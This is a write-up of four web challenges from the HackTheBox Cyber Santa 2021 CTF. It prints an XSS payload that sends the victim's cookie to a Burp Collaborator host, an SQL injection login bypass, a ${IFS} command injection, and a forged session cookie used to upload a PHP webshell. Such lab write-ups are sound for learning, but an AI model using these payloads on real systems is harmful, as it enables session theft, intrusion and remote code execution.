---
title: "HackTheBox Cyber Santa CTF 2021 Write-Up"
date: 2021-12-06T13:31:27+01:00
draft: false
categories:
    - CTF
tags:
    - CTF
    - WEB
    - XSS
    - SQLi
    - Image Code Injection
---

Name | Category | Difficulty | CTF Time
------------|----------|--------|---- 
**HackTheBox CyberSanta**| **Web** | **Easy** | **https://ctftime.org/event/1523/**

# [*] INDEX: 

- [CHALLENGE 1 - Toy Workshop](#challenge-1---toy-workshop-web)
	- XSS
- [CHALLENGE 2 - Toy Management](#challenge-2----toy-management-web)
	- SQLi
- [CHALLENGE 3 - Gadget Santa](#challenge-3----gadget-santa-web)
	- Parameter blacklist bypass
- [CHALLENGE 4 - Elf Directory](#challenge-4----elf-directory-web)
	- Cookies management
	- Image Code Injection

# Challenge 1 - Toy Workshop (Web) 

If we take a look at the source code, inside `/routes/index.js` we find 2 endpoints, `/api/submit` and `/queries` :

```js
router.post('/api/submit', async (req, res) => {

		const { query } = req.body;
		if(query){
			return db.addQuery(query)
				.then(() => {
					bot.readQueries(db);
					res.send(response('Your message is delivered successfully!'));
				});
		}
		return res.status(403).send(response('Please write your query first!'));
		
});

router.get('/queries', async (req, res, next) => {
	if(req.ip != '127.0.0.1') return res.redirect('/');

	return db.getQueries()
		.then(queries => {
			res.render('queries', { queries });
		})
		.catch(() => res.status(500).send(response('Something went wrong!')));
});
```

When we request `/api/submit`, there is a bot that's reading our query, if we take a look at `bot.js` this is how the bot works :

```js

const cookies = [{
	'name': 'flag',
	'value': 'HTB{f4k3_fl4g_f0r_t3st1ng}'
}];


const readQueries = async (db) => {
		const browser = await puppeteer.launch(browser_options);
		let context = await browser.createIncognitoBrowserContext();
		let page = await context.newPage();
		await page.goto('http://127.0.0.1:1337/');
		await page.setCookie(...cookies);
		await page.goto('http://127.0.0.1:1337/queries', {
			waitUntil: 'networkidle2'
		});
		await browser.close();
		await db.migrate();
};
```

The flag is located in the bot's cookie, the bot launches a Incognito Browser (this means that the browser won't have prestablished cookies). The bot visits localhost, sets itself the cookie and then visits `/queries`, this endpoint is only available for localhost, this is why we can't access through our browser, `/queries` is a .hbs template file, we can see this code :

```hbs
        <p class="pb-3">Welcome back, admin!</p>
        <div class="dash-frame">
            {{#each queries}}
            <p>{{{this.query}}}</p>
            {{else}}
            <p class="empty">No content</p>
            {{/each}}
        </div>
```

The variable `query` is the one that we input, so our goal will be to steal the cookie through XSS (Cross-Site Scripting). In my case I used this payload :

```
<img src=x onerror=this.src='h2k3vz59mzenp2cateh6doy960cq0f.burpcollaborator.net/?'+document.cookie;>
```

I used BurpCollaborator as you could use [RequestCatcher](https://requestcatcher.com/). We send to the server the payload :

```json
{
    "query" : "%3Cimg%20src%3Dx%20onerror%3Dthis.src%3D%27h2k3vz59mzenp2cateh6doy960cq0f.burpcollaborator.net%2F%3F%27%2Bdocument.cookie%3B%3E"
}
```

And if we check BurpCollaborator we see : 

```
GET /?flag=HTB{3v1l_3lv3s_4r3_r1s1ng_up!} HTTP/1.1
```

> HTB{3v1l_3lv3s_4r3_r1s1ng_up!}

# Challenge 2  - Toy Management (Web)

In this challenge we see a login panel, if we take a look at the source code we find `database.sql` :

```sql
INSERT INTO `toylist` (`id`, `toy`, `receiver`, `location`, `approved`) VALUES
(1,  'She-Ra, Princess of Power', 'Elaina Love', 'Houston', 1),
(2, 'Bayblade Burst Evolution', 'Jarrett Pace', 'Dallas', 1),
(3, 'Barbie Dreamhouse Playset', 'Kristin Vang', 'Austin', 1),
(4, 'StarWars Action Figures', 'Jaslyn Huerta', 'Amarillo', 1),
(5, 'Hot Wheels: Volkswagen Beach Bomb', 'Eric Cameron', 'San Antonio', 1),
(6, 'Polly Pocket dolls', 'Aracely Monroe', 'El Paso', 1),
(7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0);

INSERT INTO `users` (`id`, `username`, `password`) VALUES
(1, 'manager', '69bbdcd1f9feab7842f3a1c152062407'),
(2, 'admin', '592c094d5574fb32fe9d4cce27240588');
```

We can see the flag, users and their md5 hashes, once here let's check the routes :

```js
router.post('/api/login', async (req, res) => {
	const { username, password } = req.body;
	if (username && password) {
		passhash = crypto.createHash('md5').update(password).digest('hex');
		return db.loginUser(username, passhash)
			.then(user => {
				if (!user.length) return res.status(403).send(response('Invalid username or password!'));
				JWTHelper.sign({ username: user[0].username })
					.then(token => {
						res.cookie('session', token, { maxAge: 43200000 });
						res.send(response('User authenticated successfully!'));
					})
			})
			.catch(() => res.status(403).send(response('Invalid username or password!')));
	}
	return res.status(500).send(response('Missing parameters!'));
});
```

The password is hashed before the SQL query, so a priori we're not able to perform SQL injection in the password field, while the username is not being parsed , let's check `database.js` where all the queries to the database are crafted : 

```js
	async connect() {
		return new Promise((resolve, reject)=> {
			this.connection.connect((err)=> {
				if(err)
					reject(err)
				resolve()
			});
		})
	}
	
	async listToys(approved=1) {
		return new Promise(async (resolve, reject) => {
			let stmt = `SELECT * FROM toylist WHERE approved = ?`;
			this.connection.query(stmt, [approved], (err, result) => {
				if(err)
					reject(err)
				try {
					resolve(JSON.parse(JSON.stringify(result)))
				}
				catch (e) {
					reject(e)
				}
			})
			
		});
	}

	async loginUser(user, pass) {
		return new Promise(async (resolve, reject) => {
			let stmt = `SELECT username FROM users WHERE username = '${user}' and password = '${pass}'`;
			this.connection.query(stmt, (err, result) => {
				if(err)
					reject(err)
				try {
					resolve(JSON.parse(JSON.stringify(result)))
				}
				catch (e) {
					reject(e)
				}
			})
		});
	}

	async getUser(user) {
		return new Promise(async (resolve, reject) => {
			let stmt = `SELECT * FROM users WHERE username = '${user}'`;
			this.connection.query(stmt, (err, result) => {
				if(err)
					reject(err)
				try {
					resolve(JSON.parse(JSON.stringify(result)))
				}
				catch (e) {
					reject(e)
				}
			})
		});
	}

}

module.exports = Database;
```

The `loginUser` function is actually not implementing the query correctly :

```js
let stmt = `SELECT username FROM users WHERE username = '${user}' and password = '${pass}'`;
```

This is vulnerable against SQL Injection, we want to perform the following query :

```sql
SELECT username FROM users WHERE username = 'admin' or 1=1 -- ' and password = '0cc175b9c0f1b6a831c399e269772661'
```

So our payload will be :

```sql
admin' or 1=1 -- 
```

Request : 

```json
{
    "username":"admin' or 1=1 -- ",
    "password":"any"
}
-----------------------
{
    "message":"User authenticated successfully!"
}
```

And just grab the flag :

> HTB{1nj3cti0n_1s_in3v1t4bl3}

# Challenge 3  - Gadget Santa (Web)

In the webapp we see that we have command execution through the url parameter :

```
http://127.0.0.1:1337/?command=list_ram

              total        used        free      shared  buff/cache   available
Mem:          7.8Gi       1.5Gi       4.9Gi        58Mi       1.4Gi       6.0Gi
Swap:         974Mi          0B       974Mi
```

If we check the source code we realize that the flag is located in the `/get_flag` directory :

```py
def http_server(host_port,content_type="application/json"):
	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			def resp_ok():
				self.send_response(200)
				self.send_header("Content-type", content_type)
				self.end_headers()
			if self.path == '/':
				resp_ok()
				if check_service():
					self.wfile.write(get_json({'status': 'running'}))
				else:
					self.wfile.write(get_json({'status': 'not running'}))
				return
			elif self.path == '/restart':
				restart_service()
				resp_ok()
				self.wfile.write(get_json({'status': 'service restarted successfully'}))
				return
			elif self.path == '/get_flag':
				resp_ok()
				self.wfile.write(get_json({'status': 'HTB{f4k3_fl4g_f0r_t3st1ng}'}))
				return
			self.send_error(404, '404 not found')
		def log_message(self, format, *args):
			pass
	class _TCPServer(TCPServer):
		allow_reuse_address = True
	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()
```

But that directory is only accessible by localhost, due to the fact that the port that stores the directory is not accessible by external connections, and the port is the 3000 as we can see in `santa_mon.sh` :

```bash
#!/bin/bash 

ups_status() {
    curl localhost:3000;
}

restart_ups() {
    curl localhost:3000/restart;
}

list_processes() {
    ps -ef
}
```
So we have to perform the request from the url. The command is received by `MonitorController.php` :

```php
<?php
class MonitorController
{
    public function index($router)
    {
        $command = isset($_GET['command']) ? $_GET['command'] : 'welcome';
        
        $monitor = new MonitorModel($command);
        return $router->view('index', ['output' => $monitor->getOutput()]);
    }
}
```

At the same time, `MonitorController.php` sends the command to `MonitorModel.php` where the parameter is being sanitized with `preg_replace()` function, removing all the spaces :

```php
    public function sanitize($command)
    {   
        $command = preg_replace('/\s+/', '', $command);
        return $command;
    }
```

This can be easily bypassed using ${IFS} instead of a space (due to the fact that in bash ${IFS} equals to a space). I used the following payload :

```
curl${IFS}localhost:3000/get_flag
```

Let's request -> `http://127.0.0.1:1337/?command=id;curl${IFS}localhost:3000/get_flag`

```
uid=1000(www) gid=1000(www) groups=1000(www)
{"status": "HTB{54nt4_i5_th3_r34l_r3d_t34m3r}"}
```

> HTB{54nt4_i5_th3_r34l_r3d_t34m3r}

# Challenge 4  - Elf Directory (Web)

In this challenge we're gonna deal with a bad implementation of permissions inside a cookie, this challenge doesn't has source code, first we have to register. Then we realize that we don't have permission to edit our profile.

![<- Not working](/static/HACKING/htb-cybersanta-2021-1.png)

If we take a look at the cookie, we see that it's actually base64 encoded :

```json
Cookie -> PHPSESSID=eyJ1c2VybmFtZSI6Im1haWt5IiwiYXBwcm92ZWQiOmZhbHNlfQ%3D%3D

Decoded Cookie -> {"username":"maiky","approved":false}
```

We can turn "aprroved" value into true :

```json
Decoded Cookie -> {"username":"maiky","approved":true}

Cookie -> PHPSESSID:eyJ1c2VybmFtZSI6Im1haWt5IiwiYXBwcm92ZWQiOnRydWV9
```

![<- Not working](/static/HACKING/htb-cybersanta-2021-2.png)

Now we can upload images, let's get a png image and inject a php webshell :

But first we have to change the extension of the file to `image.png.php`

![<- Not working](/static/HACKING/htb-cybersanta-2021-3.png)

Now we must inject the code, in my case I'll be using this [webshell](https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php) :

![<- Not working](/static/HACKING/htb-cybersanta-2021-4.png)

Upload and open the image in a new tab :

![<- Not working](/static/HACKING/htb-cybersanta-2021-5.png)

Now we just have to grab the flag :

> HTB{br4k3_au7hs_g3t_5h3lls}
